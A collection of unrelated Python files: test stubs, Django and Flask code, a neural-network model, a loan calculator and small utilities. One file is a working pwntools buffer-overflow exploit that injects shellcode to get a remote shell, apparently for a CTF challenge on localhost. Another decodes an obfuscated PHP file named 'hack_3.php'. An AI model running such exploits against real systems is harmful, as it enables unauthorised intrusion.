(start_reservation, end_reservation), user = 'joda001')
b_reserve_cmd = b_reserve.get_command()
print b_reserve_cmd
b_reserve_output = b_reserve.get_output()
def test_breserve_del(self):
"""test breserve del"""
b_reserve = BreserveFake(self.profile, 'del', '97698789')
b_reserve_cmd = b_reserve.get_command()
print b_reserve_cmd
b_reserve_output = b_reserve.get_output()
def test_brun(self):
"""test brun"""
b_run = BrunFake(self.profile, 'a.c.d.it', '54534534')
b_run_cmd = b_run.get_command()
print b_run_cmd
b_run_output = b_run.get_output()
def test_bsub(self):
"""test bsub"""
b_sub = BsubFake(self.profile, 'cippa', user = '')
b_sub_cmd = b_sub.get_command()
print b_sub_cmd
b_sub_output = b_sub.get_output()
def test_bsub_user(self):
"""test bsub with user"""
b_sub = BsubFake(self.profile, 'cippa', user = 'joda001')
b_sub_cmd = b_sub.get_command()
print b_sub_cmd
b_sub_output = b_sub.get_output()
def main():
suite = unittest.TestLoader().loadTestsFromTestCase(BatchLsfTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
if __name__ == '__main__':
main()
|
from django.db.models.query import QuerySet
from django.db.models.sql.query import Query
from twango.db import connections
from twango.decorators import call_in_thread
from twisted.internet import threads
class TwistedQuery(Query):
def twisted_compiler(self, using=None, connection=None):
"""
!!! NOT YET USED
"""
if using is None and connection is None:
raise ValueError("Need either using or connection")
if using:
connection = connections[using]
else:
connection = connections[connection.alias]
# Check that the compiler will be able to execute the query
for alias, aggregate in self.aggregate_select.items():
connection.ops.check_aggregate_support(aggregate)
return connection.ops.compiler(self.compiler)(self, connection, using)
class TwistedQuerySet(QuerySet):
def __init__(self, model=None, query=None, using=None, hints=None):
query = query or TwistedQuery(model)
super(TwistedQuerySet, self).__init__(model=model, query=query, using=using, hints=hints)
self.success_callback = None
self.error_callback = None
def twist(self):
"""
!!! NOT YET USED
Use twisted database api to run the query and return the raw results in a deferred
"""
query = self.query
assert(isinstance(query, Query))
compiler = query.get_compiler(self.db)
sql, params = compiler.as_nested_sql()
if not sql:
return
connection = connections[self.db]
return connection.runQuery(sql, params)
def _super_threaded(self, name, *args, **kwargs):
success_callback = kwargs.pop('success_callback', self.success_callback)
error_callback = kwargs.pop('error_callback', self.error_callback)
@call_in_thread(success_callback, error_callback)
def function():
return getattr(super(TwistedQuerySet, self), name)(*args, **kwargs)
return function()
def _clone(self, klass=None, setup=False, **kwargs):
self.success_callback = kwargs.pop('success_callback', self.success_callback)
self.error_callback = kwargs.pop('error_callback', self.error_callback)
return super(TwistedQuerySet, self)._clone(**kwargs)
def all(self, **kwargs):
# not working in django 1.11+
# go to TwistedManager
return self._super_threaded('all', **kwargs)
def none(self, **kwargs):
return self._super_threaded('none', **kwargs)
def count(self, **kwargs):
return self._super_threaded('count', **kwargs)
def get(self, *args, **kwargs):
return self._super_threaded('get', *args, **kwargs)
def get_or_create(self, **kwargs):
return self._super_threaded('get_or_create', **kwargs)
def delete(self, **kwargs):
return self._super_threaded('delete', **kwargs)
def update(self, values, **kwargs):
return self._super_threaded('update', values, **kwargs)
def in_bulk(self, id_list, **kwargs):
return self._super_threaded('in_bulk', id_list, **kwargs)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import vggish_params as params
import pdb
class Vggish(nn.Module):
def __init__(self):
super(Vggish, self).__init__()
# self.features = nn.Sequential(
# nn.Conv2d(1, 64, kernel_size=3, padding=1),
# nn.Conv2d(2, 64, kernel_size=3, padding=1),
# nn.MaxPool2d(kernel_size=2),
# nn.ReLU(),
# nn.Conv2d(64, 128, kernel_size=3, padding=1),
# nn.MaxPool2d(kernel_size=2),
# nn.ReLU(),
# nn.Conv2d(128, 256, kernel_size=3, padding=1),
# nn.Conv2d(256, 256, kernel_size=3, padding=1),
# nn.MaxPool2d(kernel_size=2),
# nn.ReLU(),
# nn.Conv2d(256, 512, kernel_size=3, padding=1),
# nn.Conv2d(512, 512, kernel_size=3, padding=1),
# nn.MaxPool2d(kernel_size=2),
# nn.ReLU()
# )
self.features = self.make_layers()
# self.fc = nn.Sequential(
# nn.Linear(512*6*4, 1024),
# nn.ReLU(),
# nn.Dropout(),
# nn.Linear(1024, 100),
# nn.BatchNorm1d(100, affine=False)
# )
self.fc = nn.Sequential(
nn.Linear(512*6*4, 1024),
nn.ReLU(),
nn.Dropout(),
nn.Linear(1024, 100),
nn.BatchNorm1d(100, affine=False),
nn.Dropout()
)
def make_layers(self):
layers = []
in_channels = 1
for v in [64, "M", 128, "M", 256, 256, "M", 512, 512, "M"]:
if v == "M":
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
def forward(self, x):
batch_size = x.size(0)
x = self.features(x)
# pdb.set_trace()
x = x.view(batch_size, -1)
# pdb.set_trace()
x = self.fc(x)
return x
class MyModel(nn.Module):
def __init__(self, num_class=10, num_unit=1024, weights_path=None):
super(MyModel, self).__init__()
self.vggish = Vggish()
self.classifer = nn.Sequential(
nn.Linear(100, num_unit),
nn.ReLU(),
nn.Dropout(),
nn.Linear(num_unit, num_class)
)
if weights_path is not None:
self.load_weights(weights_path)
def forward(self, x):
x = self.vggish(x)
x = self.classifer(x)
# pdb.set_trace()
return F.softmax(x, dim=1)
def load_weights(self, weights_path):
data = np.load(weights_path)
weights = data['dict'][()]
weights_name = weights.keys()
for name, param in self.named_parameters():
if name in weights_name and 'vggish' in name:
# print name
param.data = torch.from_numpy(weights[name])
|
from django import forms
#from .models import Profile
from .models import Education
# class ProfileForm(forms.ModelForm):
#
# class Meta:
# model = Profile
# fields = ('firstName', 'lastName', 'contact')
#class EducationForm(forms.ModelForm):
CATEGORIES = (
('M', 'Male'),
('F', 'Female'),
('O', 'Other'),
)
class SecondaryEducationForm(forms.ModelForm):
gender = forms.ChoiceField(choices=CATEGORIES, required=True)
class Meta:
model = Education
fields = ('name', 'homeadd', 'dob', 'contact','gender', 'yoc1', 'board1', 'percentage1', 'yoc2', 'board2', 'percentage2',
'yoc3', 'percentage3','college','course',
'company_i', 'duration', 'profile_i', 'company_i2', 'duration2', 'profile_i2',
'title_p','description_p','skills', 'work', 'git_hub', 'linked_in',)
# labels = {
# 'yoc1': "Year of completion(1)",
# 'board1':"Name of the Board",
# 'percentage1': "Percentage/ CGPA",
# 'yoc2': "Year of completion(2)",
# 'board2': "Name of the Board",
# 'percentage2': "Percentage/ CGPA",
# 'name': "Name of the Applicant",
# 'college': "Name of the College",
# 'dob': "Date Of Birth",
# 'homeadd': "Permanent Address",
# 'contact': "Contact No.",
# 'git_hub': "Add link to GitHub Profile",
# 'linked_in': "Add link to Linkedin Profile",
# 'company': "Name of the Company",
# 'duration': "Duration of Internship(in months)",
# 'work': "Work Profile/Designation",
#} |
def add(num1, num2):
print('Addition: %d' % (num1 + num2))
def subtract(num1, num2):
print('Subtraction: %d' % (abs(num1 - num2)))
def multiply(num1, num2):
print('Multiplication: %d' % (num1 * num2))
def divide(num1, num2):
print('Division: %d' % (num1 / num2))
add(2, 2) # 4
subtract(2, 10) # 8
multiply(5, 3) # 15
divide(10, 2) # 5 |
# !/usr/bin/python
# coding=utf-8
from flask import request,jsonify,session,render_template
from flask_restful import Resource,reqparse
import numpy as np
import pandas as pd
import math
import sys
import json
from datetime import datetime
# sys.path.insert(0, './functions')
sys.path.insert(0, './module')
import functions
def distribution():
# show data distribution of single numerical data
result = df_obj.graph_selector('histogram')
print("result his",result)
distribution = {'Colnames':[],'Values':[],'Descriptions':[]}
# colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
if result is not None:
colname = result['col_name']
for x in colname:
description = 'กราฟนี้คือการกระจายตัวของ{}'.format(x)
distribution['Colnames'].append(x)
distribution_df = df_obj.df.filter([x], axis=1)
distribution_df.columns = ['value']
distribution['Values'].append({x:distribution_df.to_dict(orient='records')})
# description session
# print(result[result.col_name==x].dis_type.values[0])
if result[result.col_name==x].dis_type.values[0] is not None:
description_dis_type = ' โดยกราฟมีลักษณะ{}'.format(result[result.col_name==x].dis_type.values[0])
description = description+description_dis_type
if result[result.col_name==x].mode_type.values[0] is not None:
description_mode_type = 'และมีลักษณะการกระจายตัวแบบ{}'.format(result[result.col_name==x].mode_type.values[0])
description = description+description_mode_type
distribution['Descriptions'].append({x:description})
return distribution
def scatter():
# show correlation between 2 numerical data
result = df_obj.graph_selector('scatter')
# print(result)
scatter = {'Colnames':[],'Values':[],'Descriptions':[]}
# corrlist = df_obj.data_comb[(df_obj.data_comb.col_1_type == "numeric") & (df_obj.data_comb.col_2_type == "numeric")].loc[:, ['col_1_name','col_2_name']].values.tolist()
# print(result)
if result is not None:
corrlist = result[['col_1_name','col_2_name']].values.tolist()
for corr in corrlist:
description = 'กราฟนี้คือการความสัมพันธ์ระหว่าง {} และ {} '.format(corr[0],corr[1])
str1 = ','.join([str(elem) for elem in corr])
temp = df_obj.df[corr]
temp.columns = ['x','y']
temp = temp.to_dict(orient='records')
scatter['Colnames'].append(str1)
scatter['Values'].append({str1:temp})
# description
if result[(result.col_1_name==corr[0]) & (result.col_2_name==corr[1])].corr_type.values[0] is not None:
description_corr_type = result[(result.col_1_name==corr[0]) & (result.col_2_name==corr[1])].corr_type.values[0]
if description_corr_type == 'strong postive':
description_corr_type ='มีลักษณะความสัมพันธ์มากในเชิงบวก'
elif description_corr_type == 'strong negative':
description_corr_type ='มีลักษณะความสัมพันธ์มากในเชิงลบ'
elif description_corr_type == 'moderate postive':
description_corr_type ='มีลักษณะความสัมพันธ์ในเชิงบวก'
elif description_corr_type == 'moderate negative':
description_corr_type ='มีลักษณะความสัมพันธ์ในเชิงลบ'
description = description + description_corr_type
scatter['Descriptions'].append({str1: description})
return scatter
def heatmap():
heat = df_obj.df.corr()
a = heat.unstack().to_dict()
heat = {'Colnames':[],'Values':[],'Descriptions':[]}
for a_i in a:
heat['Values'].append({'x':a_i[0],'y':a_i[1],'value':a[a_i]})
colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
for x in colname:
heat['Colnames'].append(x)
heat['Descriptions'].append("กราฟนี้แสดง")
return heat
def boxplot():
# show data qualtile and outliner of single data
result = df_obj.graph_selector('box')
# print(result)
boxplot = {'Colnames':[],'Values':[],'Descriptions':[]}
# colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
# print(result)
if result is not None:
colname = result['col_name']
for x in colname:
description = 'กราฟนี้เป็นกราฟของ {0} โดยแสดงถึงค่าการกระจายตัวของกลุ่ม ซึ่งจากกราฟพบว่าค่าเฉลี่ยของข้อมูลอยู่ที่ {1:.2f} มีค่าต่ำสุดคือ {2:.2f} และค่าสูงสุดคือ {3:.2f}'.format(x,result[result.col_name == x]['mean'].values[0],result[result.col_name == x]['min'].values[0],result[result.col_name == x]['max'].values[0])
boxplot['Colnames'].append(x)
boxplot_df = df_obj.df.filter([x], axis=1)
boxplot['Values'].append({x:boxplot_df[x].to_list()})
# description
if result[result.col_name == x].outlier_percent.values[0] is not None:
description_outlier_percent = 'ปริมาณข้อมูลที่อยู่ห่างจากกลุ่มมาก ๆ มีอยู่ {0:.2f} % ซึ่งเป็นปริมาณที่{1}'.format(result[result.col_name == x].outlier_percent.values[0]*100,result[result.col_name == x].argument.values[0])
description = description+description_outlier_percent
boxplot['Descriptions'].append({x:description})
return boxplot
def bar_cat():
result = df_obj.graph_selector('bar')
bar_cat = {'Colnames':[],'Values':[],'Descriptions':[]}
print(result)
if result is not None:
colname = result['col_name']
for x in colname:
description = 'กราฟนี้เป็นแสดงการเปรียบเทียบปริมาณของ{} '.format(x)
bar_cat['Colnames'].append(x)
tempT = df_obj.cat_count[x].T.to_dict(orient='records')[0]
bar = []
for i in tempT:
bar.append({'name':i,'value':tempT[i]})
bar_cat['Values'].append({x:bar})
if result[result.col_name == x].argument.values[0] is not None:
description = description + 'ซึ่งมีลักษณะของข้อมูลอยู่ในรูปแบบที่เป็น{} '.format(result[result.col_name == x].argument.values[0])
if result[result.col_name == x].anomal_attribute.values[0] is not None:
description = description + 'มี anomal attribute {} '.format(result[result.col_name == x].anomal_attribute.values[0])
if result[result.col_name == x].anomal_value.values[0] is not None and not math.isnan(result[result.col_name == x].anomal_value.values[0]):
description = description + 'มี anomal value {} '.format(result[result.col_name == x].anomal_value.values[0])
if result[result.col_name == x].percent_dominate.values[0] is not None and not math.isnan(result[result.col_name == x].percent_dominate.values[0]):
description = description + 'มี percent dominate อยู่ที่ {0:.2f} % '.format(result[result.col_name == x].percent_dominate.values[0]*100 )
bar_cat['Descriptions'].append({x:description})
return bar_cat
def ecdf():
result = df_obj.graph_selector('ecdf')
# print(result)
ecdf = {'Colnames':[],'Values':[],'Descriptions':[]}
# colname = df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()
if result is not None:
colname = result['col_name']
for x in colname:
# print(x)
description = 'กราฟนี้เป็นกราฟแจกแจงสะสมเชิงประจักษ์ของ {} '.format(x)
_ecdf = df_obj._prep_ecdf(x)
# print(_ecdf[0])
if _ecdf[0] > 0:
_ecdf = _ecdf[1].to_dict(orient='records')
ecdf['Colnames'].append(x)
ecdf['Values'].append({x:_ecdf})
# descriptions
if result[result.col_name == x].break_percent.values[0] is not None:
description = description + 'ซึ่งมีค่าอัตราการการกระจายของข้อมูลอยู่ที่ {0:.2f} %'.format(result[result.col_name == x].break_percent.values[0])
ecdf['Descriptions'].append({x:description})
return ecdf
def time():
# do time series analysis
# test with supermarket dataset
time = {'Colnames':[],'Values':[],'Descriptions':[]}
# print("time")
col = df_obj.data_type
# create new best solution later
time_col = col[(col.col_type == 'date')].col_name.values
numeric_col = col[(col.col_type == 'numeric')].col_name.values
# print(time_col)
# print(numeric_col)
for t in time_col:
for n in numeric_col:
name = t+','+n
temp = df_obj.df[[t,n]]
temp.columns = ['x','y']
temp['x']= temp['x'].dt.strftime('%Y-%m-%d')
# print(temp.head())
test_time = functions.Timeanalyze(temp)
# print(test_time.x)
print(name+' is '+str(test_time._isStationarity()))
test_time._ETS()
temp = temp.to_dict(orient='records')
time['Colnames'].append(name)
time['Values'].append({name:temp})
time['Descriptions'].append({name:"กราฟนี้แสดงการเปลี่ยนแปลงตามเวลา"})
# return time, {'Access-Control-Allow-Origin': '*'}
return time
class Data(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('arg1', type=str)
args = parser.parse_args()
args1 = args['arg1']
if args1 == 'distribution':
return distribution(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'scatter':
return scatter(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'heatmap':
return heatmap(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'boxplot':
return boxplot(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'bar_cat':
return bar_cat(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'ecdf':
return ecdf(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'time':
return time(), {'Access-Control-Allow-Origin': '*'}
elif args1 == 'bar_num':
#not finished
bar_num = {'Colnames':[],'Values':[],'Descriptions':[]}
return bar_num, {'Access-Control-Allow-Origin': '*'}
elif args1 == 'line':
#not finished
line = {'Colnames':[],'Values':[],'Descriptions':[]}
return line, {'Access-Control-Allow-Origin': '*'}
elif args1 == 'test':
test = {'Test':''}
return test, {'Access-Control-Allow-Origin': '*'}
else:
all_graph = {
'Heatmap':{'Colnames':[],'Values':[],'Descriptions':[]},
'Distribution':{'Colnames':[],'Values':[],'Descriptions':[]},
'Scatter':{'Colnames':[],'Values':[],'Descriptions':[]},
'Boxplot':{'Colnames':[],'Values':[],'Descriptions':[]},
'Bar_cat':{'Colnames':[],'Values':[],'Descriptions':[]},
'Ecdf':{'Colnames':[],'Values':[],'Descriptions':[]},
'Time':{'Colnames':[],'Values':[],'Descriptions':[]}
}
all_graph['Heatmap'] = heatmap()
all_graph['Heatmap']['Values'] = []
all_graph['Distribution'] = distribution()
all_graph['Distribution']['Values'] = []
all_graph['Scatter'] = scatter()
all_graph['Scatter']['Values'] = []
all_graph['Boxplot'] = boxplot()
all_graph['Boxplot']['Values'] = []
all_graph['Bar_cat'] = bar_cat()
all_graph['Bar_cat']['Values'] = []
all_graph['Ecdf'] = ecdf()
all_graph['Ecdf']['Values'] = []
all_graph['Time'] = time()
all_graph['Time']['Values'] = []
return all_graph, {'Access-Control-Allow-Origin': '*'}
# next step is time series variable
return "success", {'Access-Control-Allow-Origin': '*'}
def post(self):
# print(request.is_json)
data = json.loads(request.get_data().decode("utf-8"))
# data = pd.DataFrame(list(data.items()), columns=df_obj.data_type.columns)
df_obj.data_type = pd.DataFrame(data['data'])
if "target" in data:
print("have target")
df_obj.target = data['target']
else:
print("not have target")
df_obj.data_comb = df_obj._data_combinator()
df_obj.cat_count = df_obj._cat_unique_count()
# print(df_obj.data_comb)
# print(df_obj.cat_count)
return "success", {'Access-Control-Allow-Origin': '*'}
# for Upload CSV data
class Upload(Resource):
def get(self):
# print(df_obj.data_type.to_dict(orient='records'))
return df_obj.data_type.to_dict(orient='records'), {'Access-Control-Allow-Origin': '*'}
# return jsonify({'status': 'ok', 'data': df_obj.df.to_dict(orient='split')}), {'Access-Control-Allow-Origin': '*'}
def post(self):
file = request.files['file']
# global data
data = pd.read_csv(file)
# global df
global df_obj
df_obj = functions.Data_prep(data)
# print(df_obj.data_comb[(df_obj.data_comb.col_1_type == "numeric") & (df_obj.data_comb.col_2_type == "numeric")])
# print("scatter plot length is %d"%len(df_obj.data_comb[(df_obj.data_comb.col_1_type == "numeric") & (df_obj.data_comb.col_2_type == "numeric")].loc[:, ['col_1_name','col_2_name']].values.tolist()))
# show numeric type columns
# print("histogram length is %d"%len(df_obj.data_type[df_obj.data_type.col_type == "numeric"].col_name.to_list()))
data_to_session = df_obj.data_comb.to_dict(orient='records')
session['data'] = data_to_session
return "success", {'Access-Control-Allow-Origin': '*'} |
#!/usr/bin/env python
from socket import *
from time import ctime
HOST = ''
PORT = 8080
BUFSIZE = 1024
ADDR = (HOST, PORT)
ServerSocket = socket(AF_INET, SOCK_DGRAM)
ServerSocket.bind(ADDR)
while True:
print 'waiting for message...'
data, addr = ServerSocket.recvfrom(BUFSIZE)
if not data:
break
ServerSocket.sendto('[%s] %s' % (ctime(), data), addr)
print '...received from and returned to:', addr
ServerSocket.close()
|
#python script to run open pos for ap
fileHandle = open('C:\\ap_weekly_04222016.sql', 'r')
yourResult = fileHandle.read().replace('\n',' ').split(';')
fileHandle.close()
for j,k in enumerate(yourResult):
yourResult[j]=k.strip()
if yourResult[j]=='':
del yourResult[j]
def getLastQuery(theList):
maxNum=0
for z,v in enumerate(theList):
if z>maxNum:
maxNum=z
return maxNum
import pandas as pd
import pyodbc
import logging
#create database connection
fh=pyodbc.connect(dsn='financial_hast',charset='utf-8',use_unicode=True)
fh.autocommit=True
m=getLastQuery(yourResult)
for i,y in enumerate(yourResult):
if i<m:
query=y
query=query.format(**locals())
fh.execute(query)
print('step '+str(i)+ ' for the query' + ' is done!\n')
if i==m-1:
dftemp=pd.read_sql_query(yourResult[m].format(**locals()),fh)
try:
df
df=df.append(dftemp)
df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Weekly\AP_Open.csv',index=False)
df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Jeff\AP_Open.csv',index=False)
except NameError:
df=dftemp
df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Weekly\AP_Open.csv',index=False)
df.to_csv('H:\Adv_Mkt Dept\Generated_Reports\\Jeff\AP_Open.csv',index=False) |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from utils.opts import opt
from scipy import stats
import numpy as np
from PIL import Image
# Input dimensions
image_dims = (opt.im_size, opt.im_size)
input_shape = image_dims + (opt.channels,)
def resize(arr, target_size=image_dims, resample_method='bilinear'):
"""
Resize given image to the target size. Supported interpolation methods: 'bilinear' and 'nearest'
:param arr: Image in numpy.ndarray format
:param target_size: Tuple representing the target shape: (height, weight)
:param resample_method: Method used for resampling. Valid options: 'bilinear' and 'nearest'.
:return: Resized image as a numpy.ndarray
"""
if resample_method == 'bilinear':
resample = Image.BILINEAR
elif resample_method == 'nearest':
resample = Image.NEAREST
else:
raise NotImplementedError("Only 'bilinear' and 'nearest' resample methods available")
return np.array(Image.fromarray(arr).resize(target_size, resample=resample))
def normalize_image(img, dtype='f'):
"""
Normalize an image to [0, 1] or to [0, 255]. If normalized to [0, 1] the data type will be np.float32. If normalized
to [0, 255] the data type will be np.uint8.
:param img: An image in a numpy.ndarray format (dtype either np.float32 or np.unit8 depending on normalization).
:return: The normalized image array.
"""
if dtype == 'f':
return (img - img.min()) / (img.max() - img.min())
elif dtype in ('u', 'i'):
return ((img - img.min()) / (img.max() - img.min()) * 255).astype(np.uint8)
else:
raise TypeError("dtype can be either 'u', 'i' for [0, 255] images or 'f' for [0, 1].")
def repeat3(img):
"""
Repeat an array 3 times along its last axis
:param img: A numpy.ndarray
:return: A numpy.ndarray with a shape of: img.shape + (3,)
"""
return np.repeat(img[..., np.newaxis], 3, axis=-1)
def percentile(arr, percent):
"""
Accepts an arbitrary percentage (let's say x) and returns the value that lies on the x-th percentile (i.e. below
that value is x percent of the values of the array.
:param arr: An array (numpy.ndarray).
:param percent: A percentile (int in (0, 100)).
:return: The value that lies on the given percentile (float).
"""
return arr.min() + stats.iqr(arr, rng=(0, percent))
|
#!/usr/bin/env python2
from pwn import *
context(arch = 'i386', os = 'linux')
RET_OFFSET = 0x88 + 4
CALL_EAX_INSTRUCTION_LOCATION = 0x080486e6
SHELLCODE = asm(shellcraft.findpeersh())
PAYLOAD=flat(SHELLCODE, "A" * (RET_OFFSET - len(SHELLCODE)), CALL_EAX_INSTRUCTION_LOCATION)
r = remote("localhost", 6655)
r.recvline("Hello and welcome to this small trampolining challenge.")
r.recvline("byte stack buffer.")
r.send(PAYLOAD)
r.interactive()
|
import re
def read(file):
with open(file, "r") as f:
data = f.read()
return data
def decode(string):
return decode_hex(decode_oct(string))
def decode_hex(hex_string):
return decode_pattern(hex_string, "(\\\\x[0-9a-f]{2})", 16, 2)
def decode_oct(oct_string):
return decode_pattern(oct_string, "(\\\\[0-7]{2,3})", 8, 1)
def decode_pattern(encoded_string, pattern, base, offset):
decoded_string = encoded_string
for match in re.finditer(pattern, encoded_string):
matched = match.group(1)
char_index = int(matched[offset:], base)
if 31 < char_index < 127:
replacement = chr(char_index)
print("Replace : " + matched + " => " + replacement)
decoded_string = decoded_string.replace(matched, replacement)
return decoded_string
def main():
data = read("hack_3.php")
print(data)
print(decode(data))
main()
|
# -*- encoding:utf-8 -*-
# __author__=='Gan'
# You are given a map in form of a two-dimensional integer grid where 1 represents land and 0 represents water.
# Grid cells are connected horizontally/vertically (not diagonally). The grid is completely surrounded by water,
# and there is exactly one island (i.e., one or more connected land cells). The island doesn't have "lakes"
# (water inside that isn't connected to the water around the island). One cell is a square with side length 1.
# The grid is rectangular, width and height don't exceed 100. Determine the perimeter of the island.
# Example:
# [[0,1,0,0],
# [1,1,1,0],
# [0,1,0,0],
# [1,1,0,0]]
# Answer: 16
# Explanation: The perimeter is the 16 yellow stripes in the image below:
# 5833 / 5833 test cases passed.
# Status: Accepted
# Runtime: 228 ms
# Your runtime beats 93.92 % of python submissions.
class Solution(object):
def islandPerimeter(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
rows, cols = len(grid), len(grid[0])
lands = neighbours = 0
for row in range(rows):
for col in range(cols):
if grid[row][col]:
lands += 1
if col < cols - 1 and grid[row][col + 1]:
neighbours += 1
if row < rows - 1 and grid[row + 1][col]:
neighbours += 1
return lands * 4 - neighbours * 2
# Boundary and water.
# 5833 / 5833 test cases passed.
# Status: Accepted
# Runtime: 322 ms
# Your runtime beats 55.99 % of python submissions.
class Solution(object):
def islandPerimeter(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
rows, cols = len(grid), len(grid[0])
def sub_element(row, col):
ans = 0
if row == 0:
ans += 1
if row + 1 == rows:
ans += 1
if col == 0:
ans += 1
if col + 1 == cols:
ans += 1
if 0 < row and not grid[row - 1][col]:
ans += 1
if row < rows - 1 and not grid[row + 1][col]:
ans += 1
if 0 < col and not grid[row][col - 1]:
ans += 1
if col < cols - 1 and not grid[row][col + 1]:
ans += 1
return ans
ans = 0
for row in range(len(grid)):
for col in range(len(grid[0])):
if grid[row][col]:
ans += sub_element(row, col)
return ans
class Solution(object):
def islandPerimeter(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
res = 0
for g in (grid, zip(*grid)):
for row in g:
temp = 0
for block in row:
if block == 1:
temp = 2
else:
res += temp
temp = 0
res += temp
return res
if __name__ == '__main__':
print(Solution().islandPerimeter(
[[0, 1, 0, 0],
[1, 1, 1, 0],
[0, 1, 0, 0],
[1, 1, 0, 0]]
))
print(Solution().islandPerimeter(
[[1, 1],
[1, 1]]
))
print(Solution().islandPerimeter(
[[1, 0],
[0, 1]]
))
print(Solution().islandPerimeter(
[[1]]
))
|
from django.db import models
class Tweet(models.Model):
twt_id = models.BigIntegerField()
username = models.CharField(max_length=50)
created = models.DateTimeField(auto_now_add=True)
created_at = models.TextField()
adjusted_time = models.DateTimeField(null=True, blank=True)
text = models.TextField()
retweet_count = models.IntegerField(null=True)
favorite_count = models.IntegerField(null=True)
popular = models.IntegerField(null=True, blank=True)
class Meta:
ordering = ['-created']
def __str__(self):
return self.username
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
class move():
def __init__(self):
pub =rospy.init_node('ControlTurtleBot', anonymous=False)
rospy.on_shutdown(self.shutdown)
self.cmd_vel=rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10)
r = rospy.Rate(10)
twist = Twist()
twist.linear.x = 2
twist.angular.z = 0.5
while not rospy.is_shutdown():
print("aaa")
self.cmd_vel.publish(twist)
r.sleep
def shutdown(self):
self.cmd_vel.publish(Twist())
rospy.sleep(1)
if __name__ == '__main__':
move()
|
import database_conversion as dbc
import subprocess
import sys, os
os.system(command)
dbc.download()
subprocess.run(input="audio-convert.sh")
|
"""
The Metro Bank provides various types of loans such as car loans, business loans and house loans to its account holders. Write a python program to implement the following requirements:
Initialize the following variables with appropriate input values:account_number, account_balance, salary, loan_type, loan_amount_expected and customer_emi_expected.
The account number should be of 4 digits and its first digit should be 1.
The customer should have a minimum balance of Rupees 1 Lakh in the account.
If the above rules are valid, determine the eligible loan amount and the EMI that the bank can provide to its customers based on their salary and the loan type they expect to avail.
The bank would provide the loan, only if the loan amount and the number of EMI’s requested by the customer is less than or equal to the loan amount and the number of EMI’s decided by the bank respectively.
Display appropriate error messages for all invalid data. If all the business rules are satisfied ,then display account number, eligible and requested loan amount and EMI’s.
Test your code by providing different values for the input variables.
+---------+-----------+----------------------+--------------------------------+
| Salary | Loan type | Eligible loan amount | No. of EMI’s required to repay |
+---------+-----------+----------------------+--------------------------------+
| > 25000 | Car | 500000 | 36 |
+---------+-----------+----------------------+--------------------------------+
| > 50000 | House | 6000000 | 60 |
+---------+-----------+----------------------+--------------------------------+
| > 75000 | Business | 7500000 | 84 |
+---------+-----------+----------------------+--------------------------------+
"""
def calculate_loan(account_number,salary,account_balance,loan_type,loan_amount_expected,customer_emi_expected):
eligible_loan_amount=0
bank_emi_expected=0
if account_number>999 and account_number<2000:
if account_balance>=100000:
if salary>25000 and loan_type=="Car":
eligible_loan_amount=500000
bank_emi_expected=36
if loan_amount_expected<=eligible_loan_amount and customer_emi_expected<=bank_emi_expected:
print("Account number:", account_number)
print("The customer can avail the amount of Rs.", eligible_loan_amount)
print("Eligible EMIs :", bank_emi_expected)
print("Requested loan amount:", loan_amount_expected)
print("Requested EMI's:",customer_emi_expected)
else:
print("The customer is not eligible for the loan")
elif salary>50000 and loan_type=="House":
eligible_loan_amount = 6000000
bank_emi_expected = 60
if loan_amount_expected<=eligible_loan_amount and customer_emi_expected<=bank_emi_expected:
print("Account number:", account_number)
print("The customer can avail the amount of Rs.", eligible_loan_amount)
print("Eligible EMIs :", bank_emi_expected)
print("Requested loan amount:", loan_amount_expected)
print("Requested EMI's:", customer_emi_expected)
else:
print("The customer is not eligible for the loan")
elif salary>75000 and loan_type=="Business":
eligible_loan_amount = 7500000
bank_emi_expected = 84
if loan_amount_expected<=eligible_loan_amount and customer_emi_expected<=bank_emi_expected:
print("Account number:", account_number)
print("The customer can avail the amount of Rs.", eligible_loan_amount)
print("Eligible EMIs :", bank_emi_expected)
print("Requested loan amount:", loan_amount_expected)
print("Requested EMI's:", customer_emi_expected)
else:
print("The customer is not eligible for the loan")
else:
print("Invalid loan type or salary")
else:
print("Insufficient account balance")
else:
print("Invalid account number")
#Test your code for different values and observe the results
calculate_loan(1001,40000,250000,"Car",300000,30)
|
#import statements
from globals import friends
from spy_details import Spy
from termcolor import colored
from spy_details import spy
#FUNCTION FOR ADDING A FRIEND
def add_friend():
# Using the class spy
new_friend = Spy(" ", " ", 0, 0.0)
while True:
new_friend.name = raw_input("Please add your friend's name:- ")
if len(new_friend.name)>0:
while True:
new_friend.salutation = raw_input("Are they Mr. or Ms. ?:- ")
if len(new_friend.salutation)>0:
if (new_friend.salutation == 'ms.' or new_friend.salutation == 'Ms.' or new_friend.salutation == "Mr." or new_friend.salutation == "mr."):
# ask for the age of the friend
while True:
new_friend.age = raw_input("Age?:- ")
# Type casting to integer
if len(new_friend.age) > 0:
new_friend.age = int(new_friend.age)
if 18 < new_friend.age < 50:
# After the conditions are satisfied the friend will be added
friends.append(new_friend)
print(colored('FRIEND ADDED!', "magenta"))
else:
print (colored("Sorry but your age is not valid for spy!", 'red'))
print(colored(" THANK YOU! ", 'yellow'))
exit()
